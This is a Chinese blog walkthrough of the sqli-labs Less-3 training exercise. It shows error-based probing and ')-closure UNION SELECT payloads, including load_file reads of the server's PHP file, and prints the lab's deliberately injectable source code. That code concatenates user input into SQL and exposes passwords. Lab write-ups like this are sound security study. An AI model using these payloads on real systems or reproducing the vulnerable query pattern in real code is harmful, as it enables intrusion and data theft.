sqli-labs之Less-3
涂寐 Lv5

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本文首发于 涂寐’s Blogs:https://0xtlu.github.io/article/f8d3a67c.html

0x00 万能的单引号

写入/?id=1'存在报错'1'') LIMIT 0,1
3个引号,1'是我写入,那就是单引号没成对构成错误。
同时,可以知道传入的id被小括号括起来,也可能不止。
故,在后面进行注释符写入时需要补上右半边小括号。

1
http://192.168.184.129:49154/Less-3/?id=1%27

image

0x01 构造闭合

查看其他语句,直接访问笔记:sqli-labs之Less-1

1
2
3
http://192.168.184.129:49154/Less-3/?id=1%27)%23
http://192.168.184.129:49154/Less-3/?id=-1') union select 1,2,load_file('/var/www/html/Less-3/index.php') --+
http://192.168.184.129:49154/Less-3/?id=-1') union select 1,2,load_file('/var/www/html/Less-3/index.php')%23

image

0x02 源码分析

果然是对进行单引号和括号包裹,但其他还是和Less1一致,直接访问笔记:sqli-labs之Less-1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity


$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-3.jpg" /></center>
</body>
</html>
</font>
 评论